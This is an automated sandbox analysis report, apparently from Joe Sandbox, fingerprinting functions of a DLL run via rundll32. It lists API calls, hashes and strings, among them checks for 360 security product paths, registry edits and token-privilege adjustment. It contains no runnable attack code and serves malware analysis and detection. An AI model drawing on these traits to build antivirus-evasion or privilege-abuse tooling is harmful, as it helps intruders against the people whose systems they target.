                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$FilePath$Exists$BackslashCloseModuleNameOpenQueryValue
                                                                                                  • String ID: %s\%s$360SkinMgr.exe$360leakfixer.exe$Path$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360sd.exe$hipsver.dll$safemon\360Cactus.tpi$safemon\FreeSaaS.tpi$safemon\pedrver.dll
                                                                                                  • API String ID: 4260417939-4002867936
                                                                                                  • Opcode ID: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
                                                                                                  • Instruction ID: bf4960b57fd98bc25e9fd953caee1d48b1d668c6bea79cfa729634ea3028d897
                                                                                                  • Opcode Fuzzy Hash: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
                                                                                                  • Instruction Fuzzy Hash: BCB13D31614E8895EBA2DB21EC543DA63A4F78DBC4F908116FA9D87A95EF39C70DC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018007C140 Relevance: 61.4, APIs: 32, Strings: 2, Instructions: 1880COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$memset$_errno
                                                                                                  • String ID: s$s
                                                                                                  • API String ID: 1013060226-2433928763
                                                                                                  • Opcode ID: 80b0ab6508d627de71779979219e21ca881affaedfde3055972eae66f5e13f87
                                                                                                  • Instruction ID: 1d7952d8602a8676256beffd8a10231c25a82f7a790c47b417b2fdc91bffeec8
                                                                                                  • Opcode Fuzzy Hash: 80b0ab6508d627de71779979219e21ca881affaedfde3055972eae66f5e13f87
                                                                                                  • Instruction Fuzzy Hash: E603C2727106898BE7B6CF29D444BE977A1F38C7C8F509119EA4657B84DF3ADA09CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003AFE8 Relevance: 53.2, APIs: 29, Strings: 1, Instructions: 700COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 000000018003B0A7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@
                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                                                                                                  • API String ID: 1936579350-1713319389
                                                                                                  • Opcode ID: de07e1bc86237a5aca6dd0dfd658aa05e3ed97bf1d4081ac9606dc9f4cbeac81
                                                                                                  • Instruction ID: 78c147e4d1709cfe56d0b7305879f473f1c9ccde168616adeb7b08352c337043
                                                                                                  • Opcode Fuzzy Hash: de07e1bc86237a5aca6dd0dfd658aa05e3ed97bf1d4081ac9606dc9f4cbeac81
                                                                                                  • Instruction Fuzzy Hash: 8752EF32709B8889FB46CF65D5143EE27A1A3087D8F458621EB6E57BDADF79C249C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180076930 Relevance: 46.7, APIs: 22, Strings: 4, Instructions: 1188COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmovememset$_errno$fegetenv
                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                  • API String ID: 2591457777-2761157908
                                                                                                  • Opcode ID: 88a9ba00e6e068890ed251e76263c28351ad1ff40a0f5855f604ac2084e58437
                                                                                                  • Instruction ID: f7af16447f6c096e4f5e386a29f6c1111b180ab9681df128fea2e8910a76382c
                                                                                                  • Opcode Fuzzy Hash: 88a9ba00e6e068890ed251e76263c28351ad1ff40a0f5855f604ac2084e58437
                                                                                                  • Instruction Fuzzy Hash: E8B2D672B011898AE7BA8F69D4447ED37A1F38C7C8F549115EA0A57B95DF3ACB08CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180008E20 Relevance: 46.2, APIs: 20, Strings: 6, Instructions: 684registrystringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CA7
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CD3
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008D81
                                                                                                  • lstrcmpiW.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EAC
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EC6
                                                                                                  • CharNextW.USER32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008F12
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008F3D
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008FCA
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008FF8
                                                                                                  • RegDeleteValueW.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800090D2
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800090ED
                                                                                                  • CharNextW.USER32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180009118
                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800091D4
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800091F0
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180009224
                                                                                                  • RegQueryInfoKeyW.ADVAPI32 ref: 0000000180009403
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180009423
                                                                                                  • RegQueryInfoKeyW.ADVAPI32 ref: 00000001800094A2
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800094C2
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800095D6
                                                                                                  • lstrcmpiW.KERNEL32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800096CA
                                                                                                  • CoTaskMemFree.OLE32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800097AC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcmpi$CharCloseNext$InfoQuery$CreateDeleteFreeTaskValue
                                                                                                  • String ID: Delete$ForceRemove$NoRemove$REGISTRY$RegOpenKeyTransactedW$Val
                                                                                                  • API String ID: 2745146946-1115601298
                                                                                                  • Opcode ID: 56e9c84998ee59a6c392b319b6b82abac99081c69a027b1a44a57870dd930d6c
                                                                                                  • Instruction ID: ae6ecb7a7167c02cf6bf2ecb480314a04e234ded6d812639cd3a31308d1e7f2c
                                                                                                  • Opcode Fuzzy Hash: 56e9c84998ee59a6c392b319b6b82abac99081c69a027b1a44a57870dd930d6c
                                                                                                  • Instruction Fuzzy Hash: FF42C672B05B4586FB96CBA698403DE72E1BB8C7C4F54C125BE4987B98EF38C649C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001ECF4 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 323fileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2941 18001ecf4-18001ed24 2942 18001ed26-18001ed29 2941->2942 2943 18001ed2b 2941->2943 2944 18001ed38-18001ed73 call 180005498 CreateFileW 2942->2944 2945 18001ed2e-18001ed36 2943->2945 2948 18001ed79-18001ed88 GetFileSizeEx 2944->2948 2949 18001f1ab 2944->2949 2945->2944 2945->2945 2950 18001f1a2-18001f1a5 CloseHandle 2948->2950 2951 18001ed8e-18001ed96 2948->2951 2952 18001f1ad-18001f1bd 2949->2952 2950->2949 2951->2950 2953 18001ed9c-18001edd8 ??_U@YAPEAX_K@Z ReadFile 2951->2953 2954 18001edda-18001ede6 CloseHandle 2953->2954 2955 18001edeb-18001edee 2953->2955 2956 18001f18f-18001f1a0 ??3@YAXPEAX@Z 2954->2956 2957 18001ee46-18001ee50 2955->2957 2958 18001edf0-18001edf4 2955->2958 2956->2952 2960 18001eef3-18001eefa 2957->2960 2961 18001ee56-18001ee88 SetFilePointer ReadFile 2957->2961 2958->2957 2959 18001edf6-18001ee28 SetFilePointer ReadFile 2958->2959 2964 18001f17b-18001f18b CloseHandle 2959->2964 2965 18001ee2e-18001ee33 2959->2965 2962 18001ef63-18001ef6d 2960->2962 2963 18001eefc-18001ef05 2960->2963 2961->2964 2966 18001ee8e-18001ee93 2961->2966 2969 18001ef73-18001ef7c 2962->2969 2970 18001f059-18001f085 SetFilePointer ReadFile 2962->2970 2963->2962 2967 18001ef07-18001ef39 SetFilePointer ReadFile 2963->2967 2964->2956 2965->2964 2968 18001ee39-18001ee41 2965->2968 2966->2964 2971 18001ee99-18001eec6 2966->2971 2967->2964 2974 18001ef3f-18001ef44 2967->2974 2973 18001eede-18001eeee call 180036ec8 2968->2973 2969->2970 2976 18001ef82-18001ef86 2969->2976 2970->2964 2975 18001f08b-18001f090 2970->2975 2972 18001eec8-18001eedc 2971->2972 2971->2973 2972->2972 2972->2973 2973->2964 2974->2964 2978 18001ef4a-18001ef5e call 18003721c 2974->2978 2975->2964 2979 18001f096-18001f0da ??_U@YAPEAX_K@Z memmove call 18003721c 2975->2979 2976->2964 2980 18001ef8c-18001ef9e 2976->2980 2978->2964 2989 18001f16c 2979->2989 2990 18001f0e0-18001f107 memmove call 180036ec8 2979->2990 2980->2964 2984 18001efa4-18001efd5 SetFilePointer ReadFile 2980->2984 2984->2964 2985 18001efdb-18001efe0 2984->2985 2985->2964 2988 18001efe6-18001f03c ??_U@YAPEAX_K@Z MultiByteToWideChar 2985->2988 2991 18001f03e-18001f04e call 180036ec8 2988->2991 2992 18001f04f-18001f054 2988->2992 2993 18001f16f-18001f177 ??3@YAXPEAX@Z 2989->2993 2990->2989 2998 18001f109-18001f143 memmove 2990->2998 2991->2992 2992->2993 2993->2964 2999 18001f145-18001f159 2998->2999 3000 18001f15b-18001f16b call 180036ec8 2998->3000 2999->2999 2999->3000 3000->2989
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Read$Pointer$CloseHandlememmove$??3@$ByteCharCreateMultiSizeWide_wcslwrwcschr
                                                                                                  • String ID: 9
                                                                                                  • API String ID: 2469906296-2366072709
                                                                                                  • Opcode ID: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
                                                                                                  • Instruction ID: b16b18eef39a39b515becb99aaa5640e1c6952976385d86e077c0efac659451c
                                                                                                  • Opcode Fuzzy Hash: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
                                                                                                  • Instruction Fuzzy Hash: 43D1D072300A8886EBA6DF25E8507ED37A1F749BD8F448614FE5647BA8DF38C249C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180062148 Relevance: 43.9, APIs: 14, Strings: 11, Instructions: 114libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$Modulememset$CombineFileFreeHandleLibraryNamePath
                                                                                                  • String ID: ..\ipc\x64for32lib.dll$EnumProcessModules64$GetCommandLine64$GetCurrentDirectory64$GetModuleBaseNameW64$GetModuleFileNameExW64$GetModuleInformation64$IsProcessWow64Process$NtQueryInformationProcess64$NtQueryInformationThread64$ReadProcessMemory64
                                                                                                  • API String ID: 3359005274-2277939915
                                                                                                  • Opcode ID: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
                                                                                                  • Instruction ID: 36480451210aca2b5e6fe81c352119384c097133635e903ecd0715684d47c6ca
                                                                                                  • Opcode Fuzzy Hash: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
                                                                                                  • Instruction Fuzzy Hash: 2D512532201F5AA2EEA58F51E99439833A5FB4C7C0F549525EA5907A60DF38D3B9C710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018002B2EC Relevance: 42.4, APIs: 22, Strings: 2, Instructions: 383fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$File$CloseHandle$ByteCharCreateMultiReadSizeWide_wcsicmp
                                                                                                  • String ID: <script$<script
                                                                                                  • API String ID: 3854916350-2095320664
                                                                                                  • Opcode ID: aabe63095d4014b66694cbd9da80869a4679e39a58ece0fe403894298f6a2f9d
                                                                                                  • Instruction ID: f153a338753de2324ddff23d5d348aafdead37974da18f2bc7ac3ae69100bf45
                                                                                                  • Opcode Fuzzy Hash: aabe63095d4014b66694cbd9da80869a4679e39a58ece0fe403894298f6a2f9d
                                                                                                  • Instruction Fuzzy Hash: 4CE1C07120068986EA9BDF1698943F977A1FB49BC0F84C116FA5A47B91DF38CB4ED304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004B1A4 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 223processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Token$CloseHandleInformationProcess$AdjustBlockCreateEnvironmentErrorLastPrivilegesUser$ActiveConsoleCurrentDestroyDuplicateLookupOpenPrivilegeQuerySessionValuememset
                                                                                                  • String ID: SeTcbPrivilege$h$winsta0\default
                                                                                                  • API String ID: 2730501308-2823425829
                                                                                                  • Opcode ID: da626f246ce0b3925ee1fe27a827f12215fb960ca2972f5f4b6fa681b72b113d
                                                                                                  • Instruction ID: 63acb98c3057d7eee2a2f85741aa180b658631cb3bbab8e9928767d1695d7121
                                                                                                  • Opcode Fuzzy Hash: da626f246ce0b3925ee1fe27a827f12215fb960ca2972f5f4b6fa681b72b113d
                                                                                                  • Instruction Fuzzy Hash: A4A11072608B8486E7A1CF65F8507DAB7E4F7CC794F518125EA8983B68DF38C649CB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180049278 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 121memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeTokenValue$CloseHandleProcess$AdjustAllocateCreateCurrentFreeInformationInitializeLengthOpenPrivilegesRestricted
                                                                                                  • String ID: SeIncreaseWorkingSetPrivilege$SeShutdownPrivilege$SeTimeZonePrivilege$SeUndockPrivilege
                                                                                                  • API String ID: 51528658-3108072533
                                                                                                  • Opcode ID: e33c9bce59f9407c2e2ff38a6d92360040c7285e03c52f3c2110e53bb262eff8
                                                                                                  • Instruction ID: e90fc643d0e92dc4c713161bffc3fffdb9ad8c0d1725e2c558d965ce0668d002
                                                                                                  • Opcode Fuzzy Hash: e33c9bce59f9407c2e2ff38a6d92360040c7285e03c52f3c2110e53bb262eff8
                                                                                                  • Instruction Fuzzy Hash: 5E511972604B45DAE791CF61E8807DDB7B4F788B88F41811AEA5A47B68CF38C319CB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180026C84 Relevance: 33.8, APIs: 12, Strings: 7, Instructions: 559COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp$??3@memset
                                                                                                  • String ID: Application$Applications/$Applications\$Progid$\OpenWithList$\OpenWithProgids$\UserChoice
                                                                                                  • API String ID: 3035816649-3026584011
                                                                                                  • Opcode ID: c3856a03b375e45892a4d72ef0243309f0eef955c225044f7e3de6569f4e6054
                                                                                                  • Instruction ID: 8735dd277f86c71873612ff2c024f3d2b305f3a14da21f48fef006481f506be5
                                                                                                  • Opcode Fuzzy Hash: c3856a03b375e45892a4d72ef0243309f0eef955c225044f7e3de6569f4e6054
                                                                                                  • Instruction Fuzzy Hash: 19429172700A4982EBA2DF65D8407DD77A1F789BE8F408212EE5D57BA9DF38C649C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180002610 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 416registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$Close$Open$Enumfree
                                                                                                  • String ID: HKEY_LOCAL_MACHINE\$\Components\$\Features\$\Products\
                                                                                                  • API String ID: 1285027818-2258373985
                                                                                                  • Opcode ID: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
                                                                                                  • Instruction ID: 6311c4a4e92b2eb2b6e61e2371f742115398930d0f6aaa53fdf69de799299566
                                                                                                  • Opcode Fuzzy Hash: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
                                                                                                  • Instruction Fuzzy Hash: 9C126F72218AC891FAB2EB55E8453DAB365FB897C4F448111FA8E43A99DF3DC749C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800097E0 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 326libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
